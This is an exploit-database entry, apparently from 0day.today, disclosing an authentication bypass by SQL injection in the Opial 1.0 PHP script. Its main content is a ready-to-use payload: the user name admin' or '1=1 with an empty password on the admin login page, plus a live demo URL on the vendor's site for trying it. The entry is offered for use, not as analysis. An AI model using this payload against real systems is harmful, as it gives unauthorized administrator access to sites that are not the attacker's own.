id: 5455
date: 07/01/2009
title: Opial 1.0 (Auth Bypass) Remote SQL Injection Vulnerability
author: Moudi
cves: 

==========================================================
Opial 1.0 (Auth Bypass) Remote SQL Injection Vulnerability
==========================================================



==============================================================================
        [»] Opial Version 1.0 (Auth Bypass) Remote Sql Injection
==============================================================================

	[»] Script:             [ Opial Version 1.0 ]
	[»] Language:           [ PHP ]
        [»] Download:           [ http://www.opial.com/ ]
        [»] Team:               [ EvilWay ]
        [»] Price:              [ $35 - $155 ]

###########################################################################

===[ Exploit SQL ]===	
	
	[»] http://www.site.com/patch/admin/

        [»] User Name : admin' or '1=1
        [»] Password  : leave empty here

===[ LIVE DEMO ]===	

        [»] http://www.opial.com/demo/admin/

        [»] User Name : admin' or '1=1
        [»] Password  : 


Author: Moudi

###########################################################################




#  0day.today [2023-03-25]  #